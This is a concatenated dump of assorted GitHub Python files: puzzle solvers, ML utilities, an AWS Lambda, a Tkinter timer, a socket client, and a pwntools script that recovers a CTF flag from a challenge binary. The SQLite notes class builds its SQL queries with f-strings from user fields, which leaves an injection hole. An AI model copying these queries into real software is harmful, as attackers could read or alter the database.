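With 5 weapons, 6 armor choices (counting no armor), and 1 + 6 + 15 = 22 ways to pick 0-2 of the 6 rings, that is 5 * 6 * 22 = 660 loadouts to test. 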
Pick cheapest winning set of items.\n    cheapest = float(\"inf\")\n    for weapon in WEAPONS.keys():\n        for armor in ARMOR.keys():\n            # rings (min 0, max 2)\n            for i in range(0, 3):\n                for rings_set in combinations(RINGS.keys(), i):\n                    # calculate current hero stats\n                    current_attack = WEAPONS[weapon]['damage'] + sum(RINGS[ring]['damage'] for ring in rings_set)\n                    current_armor = ARMOR[armor]['armor'] + sum(RINGS[ring]['armor'] for ring in rings_set)\n                    current_cost = WEAPONS[weapon]['cost'] + ARMOR[armor]['cost'] + sum(RINGS[ring]['cost'] for ring\n                                                                                       in rings_set)\n                    # simulate fight - if boss is defeated, check current items set total price\n                    if simulate_fight_boss(current_attack, current_armor, 100):\n                        cheapest = min(cheapest, current_cost)\n\n    return cheapest\n\n\ndef simulate_fight_boss(attack: int, armor: int, hp: int) -> bool:\n    # initial fight information\n    player_stats = {\n        'damage': attack,\n        'armor': armor,\n        'hp': hp,\n    }\n    boss_stats = BOSS.copy()\n\n    # simulate fight\n    for game_round in count(0):\n        # even - players turn, odd - boss turn (min 1 dmg)\n        if game_round % 2 == 0:\n            boss_stats['hp'] -= max(player_stats['damage'] - boss_stats['armor'], 1)\n        else:\n            player_stats['hp'] -= max(boss_stats['damage'] - player_stats['armor'], 1)\n\n        # check if someone lost\n        if boss_stats['hp'] <= 0:  # fight won, return True\n            return True\n        if player_stats['hp'] <= 0:  # fight lost, return False\n            return False\n\n\nif __name__ == '__main__':\n    result = game_handler()\n    print(f\"Lowest cost to defeat boss: {result}\")\n","repo_name":"kamilczerwinski22/Advent-of-Code","sub_path":"main_files/year_2015/day_21/year2015_day21_part1.py","file_name":"year2015_day21_part1.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8186121768","text":"class Solution:\n    def moveZeroes(self, nums: List[int]) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        zeroIndex = 0\n        for i in range(len(nums)):\n            current = nums[i]\n            if current != 0:\n                nums[zeroIndex] = nums[i]\n                if i != zeroIndex:\n                    nums[i] = 0\n                zeroIndex += 1\n","repo_name":"youwithouto/leetcode-practice","sub_path":"week03/2020-12-15/delayed-init/283.move-zeros.py","file_name":"283.move-zeros.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"3167025540","text":"# Execute a hyperparameter grid search,\n# to tune the hyperparameters of both the supervised and unsupervised models.\n# Steps:\n# - for each hyperparameter, choose a few values of that hyperparameter that you want to experiment with.\n# - find all combinations of the hyperparameters [one value per hyperparameter]\n# - run the unsupervised and supervised models with each combination\n# - get the corresponding f1 score and add it to a big spreadsheet (to then examine later).\n\nfrom fasttext import *\nimport itertools\n\nSETTINGS = \"./settings\"\nCBOW_MASTER_SETTINGS_FILE = os.path.abspath(os.path.join(SETTINGS, 'cbow_master_settings.txt'))\nSKIPGRAM_MASTER_SETTINGS_FILE = os.path.abspath(os.path.join(SETTINGS, 'skipgram_master_settings.txt'))\nSCRATCH_VECTORIZE = \"../scratch-vectorize/\"\n\n# UNSUPERVISED HYPERPARAMETERS\nMODEL_TYPE = ['model_type: cbow', 'model_type: skipgram']\nMINCOUNT_UNSUPERVISED = [\"minCount: 1\", \"minCount: 5\"]\nDIM = [\"dim: 50\", \"dim: 64\", \"dim: 128\", \"dim: 175\", \"dim: 200\"]\nMINN_MAXNN = [(\"minn: 1\", \"maxn: 5\"), (\"minn: 1\", 
\"maxn: 8\"), (\"minn: 1\", \"maxn: 10\")]\nEPOCH_LR_UNSUPERVISED = [(\"epoch: 5\", \"lr: 0.1\"), (\"epoch: 10\", \"lr: 0.05\"), (\"epoch: 25\", \"lr: 0.01\"), (\"epoch: 50\", \"lr: 0.01\")]\n\n\n# SUPERVISED HYPERPARAMETERS\nMINCOUNT_SUPERVISED = [1, 5]\nEPOCH_LR_SUPERVISED = [(5, 0.1), (10, 0.1), (25, 0.05), (50, 0.05)]\nWORD_NGRAMS = [1, 5, 10] # how many ngrams to look surrounding the current word\n\ndef get_combinations(hyperparameters):\n \"\"\"\n Takes in all possible options for each hyperparameter, and returns all possible combinations between them.\n\n inputs:\n - hyperparamters: a list of lists, where each list corresponds to a certain hyperparameter and\n contains the different options for that hyperparameter.\n\n returns: a list of all possible combinations of the different hyperparameters (which a specific value for each hyperparameter)\n \"\"\"\n return list(itertools.product(*hyperparameters))\n\ndef add_hyperparameter(hyperparameter_string, hyperparamters_dictionary):\n \"\"\"\n Takes in hyperparameter_string in the form of \"hyperparameter_name: hyperparameter_value\",\n and parses that, and adds it appropriately to hyperparamters_dictionary.\n\n inputs:\n - hyperparameter_string: in the form: \"hyperparameter_name: hyperparameter_value\"\n - hyperparamters_dictionary: the dictionary to add the hyperparameter to.\n returns:\n the dictionary after adding that hyperparameter\n \"\"\"\n # split the string\n split_hyperparameter_string = hyperparameter_string.split(\":\")\n hyperparameter_name = split_hyperparameter_string[0]\n hyperparameter_value = split_hyperparameter_string[1].strip()\n hyperparamters_dictionary[hyperparameter_name] = hyperparameter_value\n return \"success\"\n\ndef get_write_string(dictionary, count, type=\"cbow\"):\n to_write = \"\"\n to_write += \"#### COMBINATION \" + str(count) + \" ####\\n\"\n\n # iterate through all the keys in this dictionary\n # and add them along with their values to the values to be written to file\n for key, value in dictionary.items():\n to_write += key + \": \" + value + \"\\n\"\n\n # append the following to the arguments:\n # - type: unsupervised\n # - input: dataset/train_500000.txt\n # - output: word_vectors/cbow_combination_\n to_write += \"type: unsupervised\\n\"\n to_write += \"input: \" + SCRATCH_VECTORIZE + \"dataset/train_500000.txt\\n\"\n to_write += \"output: \" + SCRATCH_VECTORIZE + \"word_vectors/\" + type + \"_combination_\" + str(count) + \"\\n\"\n\n # add another newline to differentiate between combinations\n to_write += \"\\n\"\n return to_write\n\nif __name__ == \"__main__\":\n UNSUPERVISED_HYPERPARAMETERS = []\n UNSUPERVISED_HYPERPARAMETERS.extend([MODEL_TYPE, MINCOUNT_UNSUPERVISED, DIM, MINN_MAXNN, EPOCH_LR_UNSUPERVISED])\n print(\"unupervised hyperparamters master list:\", UNSUPERVISED_HYPERPARAMETERS)\n combinations = get_combinations(UNSUPERVISED_HYPERPARAMETERS)\n print(\"\\n\")\n\n # create a dictionary of args corresponding to each combination of hyperparamters\n # { model_type: skipgram\n # input_target: dataset/train_1000.txt\n # minCount: 5\n # dim: 128\n # minn: 3\n # maxn: 6\n # epoch: 5\n # lr: 0.05\n # output_target: word_vectors/train_1000 }\n\n dictionaries = []\n for i in range(len(combinations)):\n combination = combinations[i]\n # print(combination)\n hyperparamters_dictionary = {}\n for element in combination:\n # element is either a string (hyperparameter) or a tuple (combination of two hyperparamters, whose values are linked)\n if type(element) == str:\n add_hyperparameter(element, 
hyperparamters_dictionary)\n # # split the string\n # split_element = element.split(\":\")\n # hyperparameter_name = split_element[0]\n # hyperparameter_value = split_element[1].strip()\n # hyperparamters_dictionary[hyperparameter_name] = hyperparameter_value\n if type(element) == tuple:\n # split each element in tuple\n # add that hyperparameter to hyperparamters_dictionary\n for hyperparameter_string in element:\n add_hyperparameter(hyperparameter_string, hyperparamters_dictionary)\n\n print(hyperparamters_dictionary)\n dictionaries.append(hyperparamters_dictionary)\n print(\"\\n\")\n print(\"number of combinations: \", len(dictionaries))\n\n # write all cbow combinations into a single txt file\n # and all skipgram combinations into a single txt file\n to_write_cbow = \"\"\n to_write_skipgram = \"\"\n cbow_count = 0\n skipgram_count = 0\n for dictionary in dictionaries:\n if dictionary['model_type'] == \"cbow\":\n cbow_count += 1\n to_write_cbow += get_write_string(dictionary, cbow_count, type=\"cbow\")\n\n elif dictionary['model_type'] == \"skipgram\":\n skipgram_count += 1\n to_write_skipgram += get_write_string(dictionary, skipgram_count, type=\"skipgram\")\n\n with open(CBOW_MASTER_SETTINGS_FILE, \"w+\") as file:\n file.write(to_write_cbow)\n\n with open(SKIPGRAM_MASTER_SETTINGS_FILE, \"w+\") as file:\n file.write(to_write_skipgram)\n","repo_name":"labdalla/scratch-recommend","sub_path":"utilities/hyperparameter_grid_search.py","file_name":"hyperparameter_grid_search.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4802957102","text":"\nimport torch\nimport itertools\nimport numpy as np\n\nfrom dlengine import comm\nfrom dlengine.evaluator import DatasetEvaluator\n\n\nclass ClassificationEvaluator(DatasetEvaluator):\n def __init__(self, distributed=True, classes=None):\n self._preds = []\n self._gts = []\n self._distributed = distributed\n self._classes = classes\n self._report = \"\"\n self._report_dict = {}\n\n def reset(self):\n self._preds = []\n self._gts = []\n\n def process(self, inputs, outputs: torch.Tensor):\n _, labels = inputs\n _, preds = torch.max(outputs, 1)\n labels = labels.cpu().detach().numpy().tolist()\n preds = preds.cpu().detach().numpy().tolist()\n self._preds.extend(preds)\n self._gts.extend(labels)\n\n def evaluate(self):\n if self._distributed:\n comm.synchronize()\n preds = comm.gather(self._preds, dst=0)\n preds = list(itertools.chain(*preds))\n\n gts = comm.gather(self._gts, dst=0)\n gts = list(itertools.chain(*gts))\n\n if not comm.is_main_process():\n return {}\n else:\n preds = self._preds\n gts = self._gts\n\n if len(preds) == 0:\n print(\"[ClassificationEvaluator] Did not receive valid predictions.\")\n return {}\n p = (np.asarray(gts) == np.asarray(preds)).sum() * 1.0 / len(gts)\n return {\n \"precision\": p\n }\n\n","repo_name":"shellhue/dlengine","sub_path":"demo/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"14184081851","text":"import streamlit as st\nfrom Home import face_rec\n\n# st.set_page_config(page_title=\"Reporting\")\nst.subheader(\"Report\")\n\n# extract data from redis\nname = 'attendance:logs'\ndef load_logs(name, end=-1):\n data = face_rec.r.lrange(name, 0, end)\n data = [x.decode('utf-8') for x in data]\n return data\n\n# tabs to show the information\ntab1, tab2 = 
st.tabs(['Registered Data', 'Attendance Logs'])\n\nwith tab1:\n    if st.button('Refresh Data'):\n        with st.spinner(\"Retrieving data from Redis\"):\n            redis_face_db = face_rec.retrive_data(name=\"academy:register\")\n            # st.dataframe(redis_face_db)\n            st.dataframe(redis_face_db[['name', 'role']])\n\nwith tab2:\n    if st.button('Refresh Logs'):\n        st.write(load_logs(name))","repo_name":"alokacomputing/aloka-vision","sub_path":"app/pages/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"11936371819","text":"from redis import Redis\nimport json\nimport boto3\nimport os\n\nresponse_headers = {\n        \"Access-Control-Allow-Headers\": \"*\",\n        \"Access-Control-Allow-Origin\": \"*\",\n        \"Access-Control-Allow-Methods\": \"POST\",\n    }\nlambda_client = boto3.client(\"lambda\")\n\ndef get_credentials():\n    '''\n    Invokes the GetSecrets functions to fetch database credentials\n    '''\n    response = lambda_client.invoke(\n        FunctionName=os.environ[\"GET_SECRET_ARN\"],\n        InvocationType=\"RequestResponse\",\n        Payload=json.dumps({\"secret_type\": \"Redis Credentials\"}),\n    )\n    payload = json.load(response[\"Payload\"])\n    if \"error\" in payload:\n        return payload\n    else:\n        credentials = payload[\"credentials\"]\n        return credentials\n\ndef lambda_handler(event, context):\n    '''\n    Gets the user input & returns array of all zipcodes matching user input\n    '''\n    credentials = get_credentials()\n    if not \"error\" in credentials:\n        redis_user = credentials[\"username\"]\n        redis_password = credentials[\"password\"]\n        redis_client = Redis(host=os.environ[\"EC_CLUSTER_ENDPOINT\"],\n                            port=6379, decode_responses=True, ssl=True,\n                            username=redis_user, password=redis_password)\n        \n        input = event[\"queryStringParameters\"].get(\"input\",\"\") if \"queryStringParameters\" in event and event[\"queryStringParameters\"] != None else \"\"\n        output = []\n        d_cities = []\n\n        if input:\n            match_str = str(input) + \"*\"\n            for k in redis_client.keys(match_str):\n                \n                data = redis_client.hgetall(k)\n                output.append(data)\n            \n            #get zipcode data by default city type D\n            d_cities = [dt for dt in output if dt['CityType'] == 'D']\n        zip_data = d_cities if d_cities else output\n        \n        return {\n            \"statusCode\" : 200,\n            \"headers\" : response_headers,\n            \"body\" : json.dumps({\n                \"msg\" : \"Data Fetched Successfully...\",\n                \"zip_data\" : zip_data\n            }),\n            \"isBase64Encoded\": False,\n        }\n    else:\n        return credentials","repo_name":"RushikeshPtl/gatekeeper-terraform","sub_path":"src/dashboard_functions/get_zip_data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24965351769","text":"from pprint import pprint\nfrom collections import deque\n\n# use hash table to store graph: key for each node, value is a list of adjacent nodes\n# use queue to store the nodes to match against\n# use a list to store all the nodes that have already been checked (avoid infinite loop)\n# 1. begin with the start node (current node)\n# 2. enqueue all the nodes that are adjacent to the current node\n# 3. pop the first node from the queue and compare it with the target node\n# 4. if matched then return\n# 5. if not, append the current node to the list of searched nodes\n# 6. 
goto step 2\n\n\ndef graph_bfs(start, end, g):\n    search_queue = deque()\n    search_queue += g[start]\n    searched = []\n    step = 0\n    while search_queue:\n        person = search_queue.popleft()\n        print(\"-\" * step + \"> %s\" % person)\n        step += 1\n        if person not in searched:  # skip searched people to avoid infinite loop\n            if person == end:\n                print(\"found %s\" % person)\n                return True\n            else:\n                searched.append(person)\n                search_queue += g[person]\n    return False\n\n\ngraph = {\"you\": [\"alice\", \"bob\", \"claire\"],\n         \"bob\": [\"anuj\", \"peggy\"],\n         \"alice\": [\"peggy\"],\n         \"claire\": [\"thom\", \"jonny\"],\n         \"anuj\": [],\n         \"peggy\": [],\n         \"thom\": [],\n         \"jonny\": []}\n\nif __name__ == '__main__':\n    pprint(graph)\n    graph_bfs(\"you\", \"thom\", graph)\n    print(\"-\" * 10)\n    graph_bfs(\"you\", \"anuj\", graph)\n    print(\"-\" * 10)\n    graph_bfs(\"you\", \"jonny\", graph)\n    print(\"-\" * 10)\n    graph_bfs(\"you\", \"\", graph)\n\n","repo_name":"sunmeng90/datastructure-algorithm-py","sub_path":"dsa/graph_bfs.py","file_name":"graph_bfs.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19181222309","text":"from tkinter import *\r\nimport time\r\nfrom tkinter import messagebox\r\n\r\n\r\ndef start():\r\n    total_time = (int(hrs_var.get()) * 3600) + (int(min_var.get()) * 60) + int(sec_var.get())\r\n    while total_time > -1:\r\n        mins, secs = divmod(total_time, 60)\r\n        hours = 0\r\n        if mins >= 60:\r\n            hours, mins = divmod(mins, 60)\r\n\r\n        text_label['text'] = \"{:02d}:{:02d}:{:02d}\".format(hours, mins, secs)\r\n\r\n        root.update()\r\n        time.sleep(1)\r\n\r\n        if total_time == 0:\r\n            messagebox.showinfo(\"python Timer\", \"Time is up \")\r\n\r\n        total_time -= 1\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"python Timer\")\r\nroot.geometry(\"250x100\")\r\nroot.resizable(False, False)\r\n\r\n\r\ntext_label = Label(root, text=\"Select time for countdown\")\r\ntext_label.grid(column=3, columnspan=5)\r\n\r\nhrs_list = list(range(0, 24))\r\nmin_list = list(range(0, 60))\r\nsec_list = list(range(0, 60))\r\n\r\nhrs_var = StringVar()\r\nhrs_var.set(\"0\")\r\nmin_var = StringVar()\r\nmin_var.set(\"0\")\r\nsec_var = StringVar()\r\nsec_var.set(\"0\")\r\n\r\nhrs_label = Label(root, text=\"Hrs\").grid(row=1, column=2)\r\nmin_label = Label(root, text=\"Min\").grid(row=1, column=4)\r\nsec_label = Label(root, text=\"Sec\").grid(row=1, column=6)\r\nempty = Label(root, text=\"\").grid(row=2)\r\n\r\nhrs_menu = OptionMenu(root, hrs_var, *hrs_list).grid(row=1, column=3)\r\nmin_menu = OptionMenu(root, min_var, *min_list).grid(row=1, column=5)\r\nsec_menu = OptionMenu(root, sec_var, *sec_list).grid(row=1, column=7)\r\n\r\nbtn_start = Button(root, text=\"Start\", command=start, width=5).grid(row=3, column=5)\r\n\r\nroot.mainloop()\r\n","repo_name":"aonuferco/testing-waters-in-python","sub_path":"countdownt.py","file_name":"countdownt.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40477207258","text":"tcs = int(input())\n\ndef solve(comp, econ):\n    sc = sum(comp)\n    ac = sc / len(comp)\n    se = sum(econ)\n    ae = se / len(econ)\n\n    \n    res = 0\n    for c in comp:\n        #print(\"new csci average\", (sc - c) / (len(comp) - 1))\n        #print(\"new econ average\", (se + c) / (len(econ) + 1))\n        if (sc - c) / (len(comp) - 1) <= ac:\n            continue\n        if (se + c) / (len(econ) + 1) <= ae:\n            continue\n        res += 1\n    return res\n\nfor _ in range(tcs):\n    _ = input()\n    _ = 
input()\n    comp = list(map(int, input().split(\" \")))\n    econ = list(map(int, input().split(\" \")))\n    print(solve(comp, econ))\n\n\n\n","repo_name":"Ikerlb/kattis","sub_path":"averageshard/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"41119896511","text":"import sqlite3\nfrom dataclasses import dataclass\n\n@dataclass\nclass Note:\n    id: int = None\n    title: str = None\n    content: str = ''\n\nclass Database():\n    def __init__(self,bankName):\n        self.conn = sqlite3.connect(bankName + '.db')\n        self.conn.execute(\n            'CREATE TABLE IF NOT EXISTS note (id INTEGER PRIMARY KEY, title TEXT, content TEXT NOT NULL);'\n        )\n    \n    def add(self,note):\n        id = note.id\n        title = note.title\n        content = note.content\n        comando = f\"INSERT INTO note (title,content) VALUES ('{title}','{content}');\"\n        self.conn.execute(\n            comando\n        )\n        self.conn.commit()\n\n    def get_all(self):\n        l = []\n        cursor = self.conn.execute(\n            \"SELECT id, title, content FROM note;\"\n        )\n        for linha in cursor:\n            identificador = linha[0]\n            titulo = linha[1]\n            content = linha[2]\n            l.append(Note(identificador,titulo,content))\n        return l\n\n    def update(self, entry):\n        id = entry.id\n        titulo = entry.title\n        content = entry.content\n        comando = f\"UPDATE note SET title = '{titulo}', content = '{content}' WHERE id = {id};\"\n        cursor = self.conn.execute(\n            comando\n        )\n        self.conn.commit()\n\n    def delete(self, note_id):\n        comando = f\"DELETE FROM note WHERE id = {note_id};\"\n        cursor = self.conn.execute(\n            comando\n        )\n        self.conn.commit()\n    \n    def get_by_id(self, id):\n        # Your code to return a note based on its ID\n        todos = self.get_all()\n        for note in todos:\n            if note.id == id:\n                return note\n        ","repo_name":"Fdemaiaar/projetoA---TecWeb","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"16561554961","text":"#! 
/usr/bin/python3\r\n\r\nimport socket \r\nfrom socket import error\r\nimport sys\r\nimport os\r\nfrom threading import Thread\r\n\r\ndef client():\r\n    try:\r\n        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n        client.connect((host, port))\r\n\r\n        while True:\r\n            try:\r\n                ts = Thread(target=send_data, args=(client,), daemon = True)\r\n                tr = Thread(target=recv_data, args=(client,), daemon = True)\r\n\r\n                ts.start()\r\n                tr.start()\r\n\r\n                ts.join()\r\n                tr.join()\r\n\r\n            except KeyboardInterrupt:\r\n                client.close()\r\n                os._exit(1)\r\n\r\n    \r\n    except ConnectionRefusedError:\r\n        print(f\"\\nCan't Connect with the Server!!!\\nPlease check whether Server application is running and try again.\\n\")\r\n\r\n\r\ndef send_data(client,):\r\n    while True:\r\n        s_data = input(\"\")\r\n\r\n        if len(s_data.strip()) == 0:\r\n            s_data = ' '\r\n\r\n        client.send(s_data.encode('utf-8'))\r\n\r\n\r\ndef recv_data(client,):\r\n    while True:\r\n        r_data = client.recv(1024).decode('utf-8')\r\n        print(r_data)\r\n        \r\n        if r_data == \"\":\r\n            client.close()\r\n            os._exit(1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    if len(sys.argv) != 2:\r\n        print(\"\\nNo port number is provided!\")\r\n        print(\"           \\uFFEC   \")\r\n        print(\"usage : python3 \" + str(sys.argv[0]) + \" [port_number]\\n\")\r\n        exit(1)\r\n\r\n    port = int(sys.argv[1])\r\n    host = \"127.0.0.1\"\r\n\r\n    client()\r\n    \r\n    \r\n","repo_name":"GayanSN/Python-Server-Client","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"13385057702","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport cv2\nimport sys\n\nflame_size = 2\nw = 0\nh = 0\n\nif __name__ == '__main__':\n\n    cap = cv2.VideoCapture(0)\n    ret, flame = cap.read()\n\n    while True:\n        ret, flame = cap.read()\n        if ret == False :\n            print(\"Error: Camera capture failed.\")\n            sys.exit(1)\n\n        height, width = flame.shape[:2]\n        # integer division keeps sizes and coordinates as ints, which OpenCV expects\n        hflame = cv2.resize(flame,(width//flame_size,height//flame_size))\n        h_height, h_width = hflame.shape[:2]\n\n        cv2.circle(hflame,(h_width//2+w,h_height//2+h),20,(0,0,255),2)\n        cv2.circle(hflame,(h_width//2+w,h_height//2+h),3,(0,0,255),-1)\n        cv2.line(hflame, (h_width//2+w,h_height//2+h+20), (h_width//2+w, h_height//2+h+30), (0, 0, 255),2)\n        cv2.line(hflame, (h_width//2+w,h_height//2+h-20), (h_width//2+w, h_height//2+h-30), (0, 0, 255),2)\n        cv2.line(hflame, (h_width//2+w+20,h_height//2+h), (h_width//2+w+30, h_height//2+h), (0, 0, 255),2)\n        cv2.line(hflame, (h_width//2+w-20,h_height//2+h), (h_width//2+w-30, h_height//2+h), (0, 0, 255),2)\n        \n        cv2.imshow('camera',hflame)\n        if cv2.waitKey(1) == ord('p'):\n            break\n\n    cap.release()\n    cv2.destroyAllWindows()\n    print(\"End of camera\")\n","repo_name":"Koshiro-Tanimoto/Lancer_Robot","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"33746983112","text":"import torch.optim as optim\n\nconfig = {\n    'nr_classes' : 2,\n    \n    'training_phase' : [\n        {\n            'nr_epochs' : 150, \n            'optimizer_g' : [\n                optim.Adam,\n                { # should match keyword for parameters within the optimizer\n                    'lr' : 1.0e-4, # initial learning rate,\n                    'betas' : (0.5, 0.999)\n                }\n            ],\n            'scheduler_g' : lambda x : optim.lr_scheduler.StepLR(x, 50), # learning rate scheduler\n\n            'optimizer_d' : [\n                optim.Adam,\n                { # should match keyword for parameters within the 
optimizer\n 'lr' : 1.0e-4, # initial learning rate,\n 'betas' : (0.5, 0.999)\n }\n ],\n 'scheduler_d' : lambda x : optim.lr_scheduler.StepLR(x, 50), # learning rate scheduler\n\n 'extra_train_opt' : {\n 'generator_period' : 1,\n 'lambda' : 120\n },\n\n 'train_batch_size' : 2,\n 'infer_batch_size' : 1,\n\n # path to load, -1 to auto load checkpoint from previous phase, \n # None to start from scratch\n 'pretrained' : None,\n },\n\n ],\n}\n","repo_name":"QuIIL/UnsupervisedTumorCharacterizationCGAN","sub_path":"model/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"32103892750","text":"# @Time : 2020/4/15 18:29\n# @Author : Libuda\n# @FileName: qihuo_spider.py\n# @Software: PyCharm\n\nimport requests\n\n\ndef spider():\n url = \"https://flash-api.jin10.com/get_flash_list?channel=2\"\n headers = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n # 'cookie': 'UM_distinctid=1717d593c7d74c-0998a4179c093a-5313f6f-144000-1717d593c7e5bc; x-token=',\n 'origin': 'https://www.jin10.com',\n 'referer': 'https://www.jin10.com/',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-site',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',\n 'x-app-id': 'SO1EJGmNgCtmpcPF',\n 'x-version': '1.0.0',\n }\n response = requests.get(url, headers=headers).json()\n\n res = []\n for i in range(20):\n tem = response['data'][i]['data']['content']\n if \"现货报价\" in tem or \"了解请戳\" in tem or \"金十产品\" in tem:\n continue\n tem = tem.replace(\"金十期货讯\", \"\").replace(\"。\", \"。\\n\\n\").replace(\"\", \"\").replace(\"
\", \"\")\n res.append(tem)\n\n return 0, res\n\n\nif __name__ == '__main__':\n res = spider()\n print(res)\n","repo_name":"budaLi/leetcode-python-","sub_path":"qq加群/qihuo_spider.py","file_name":"qihuo_spider.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"65"} +{"seq_id":"40156060667","text":"from pwn import *\n\nwith open('switcheroo', 'rb') as f:\n f.seek(0x203c)\n length = 0x243b - 0x203c + 1\n ct = f.read(length)\n\n\nflag = b''\nfor i in range(0x3f):\n _start = 0x107\n while _start != -1:\n _start = ct.find(bytes([i]), _start + 1)\n to_check = 7 - (_start % 8)\n\n pt = -1\n if to_check != 0 and ct[_start + to_check] >= to_check:\n # to_check == 0: JUMP to `0x040106b`\n # ct[_start + to_check] >= to_check\n # => s.t. it can check till `i` and jump to `0x40106e`\n pt = _start - 7 + to_check\n\n if pt != -1 and pt % 8 == 0:\n pt = pt // 8\n if pt >= 0x21 and pt <= 0x7e:\n flag += bytes([pt])\n break\n\nlog.success(f'FLAG: {flag.decode()}')\n\nif args.VERIFY:\n elf = ELF('./switcheroo')\n context.binary = elf\n r = process([elf.path])\n r.recvuntil(b'flag: ')\n r.sendline(flag)\n log.info(r.recvline()[:-1].decode())\n","repo_name":"mhsuab/ctf","sub_path":"la23/switcheroo/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22118736567","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\n\ndji_components = [\"v\", \"xom\", \"wmt\", \"cat\", \"cvx\", \"aapl\", \"gs\", \"axp\",\n \"ibm\", \"mcd\", \"mmm\", \"jpm\", \"ba\", \"trv\", \"msft\", \"dwdp\",\n \"pg\", \"nke\", \"ko\", \"mrk\", \"dis\", \"csco\", \"intc\", \"jnj\",\n \"pfe\", \"unh\", \"hd\", \"wba\", \"vz\", \"utx\"]\n\"\"\"list(str): List of Dow Jones Industrial Index component tickers.\"\"\"\n\ndefault_liquid = {\n \"VXX\", \"GE\", \"F\", \"EEM\", \"USO\", \"BAC\", \"XLF\", \"JNK\", \"GGB\", \"FXI\",\n \"EFA\", \"SLV\", \"HYG\", \"GDX\", \"XOP\", \"SPY\", \"AKS\", \"TVPT\", \"QQQ\", \"T\", \"CHK\",\n \"FCX\", \"SWN\", \"VALE\", \"AAPL\", \"ESV\", \"IWM\", \"GLD\", \"AGI\", \"CVE\", \"CPE\",\n \"BBD\", \"WFT\", \"AMD\", \"WFC\", \"IBN\", \"MSFT\", \"NIO\", \"SAN\", \"BB\", \"NVAX\", \"JD\",\n \"SIRI\", \"INTC\", \"GSAT\", \"QEP\", \"VZ\", \"CMCSA\", \"GIS\", \"JPM\", \"EWZ\", \"SNAP\",\n \"C\", \"MU\", \"QCOM\", \"BCS\", \"NGD\", \"XLU\", \"FB\", \"RIG\", \"KNX\", \"JCP\", \"RF\",\n \"NOK\", \"ENPH\", \"PACB\", \"GPRO\", \"NOG\", \"PBR\", \"FITB\", \"DNR\", \"AMBC\", \"APHA\",\n \"SLB\", \"PE\", \"KMI\", \"UNIT\", \"FIT\", \"XLP\", \"SQQQ\", \"ZNGA\", \"PSEC\", \"PFE\",\n \"MS\", \"LEN\", \"EVRI\", \"DIS\", \"UXIN\", \"ITUB\", \"SBUX\", \"PVG\", \"PLUG\", \"AUY\",\n \"GM\", \"CZR\", \"KHC\", \"TWTR\", \"GFI\", \"ET\", \"TEVA\", \"RAD\", \"NIHD\", \"M\", \"TXT\",\n \"ZAYO\", \"UUP\", \"DB\", \"KO\", \"TTOO\", \"FHN\", \"EBAY\", \"FCAU\", \"KRE\", \"SID\",\n \"ACRX\", \"HAL\", \"TLT\", \"WPM\", \"IQ\", \"XHB\", \"ERIC\", \"IAG\", \"AAL\", \"NLSN\", \"X\",\n \"HL\", \"SQ\", \"NWL\", \"GLNG\", \"XME\", \"AGNC\", \"DF\", \"MRK\", \"CSCO\", \"OIH\", \"NEM\",\n \"CLNE\", \"MEET\", \"HPQ\", \"PCG\", \"GOLD\", \"FEZ\", \"PEGI\", \"HBAN\", \"CLF\", \"BKS\",\n \"SNH\", \"EWW\", \"NEPT\", \"XLE\", \"LVS\", \"XLRE\", \"BMY\", \"USB\", \"SAND\", 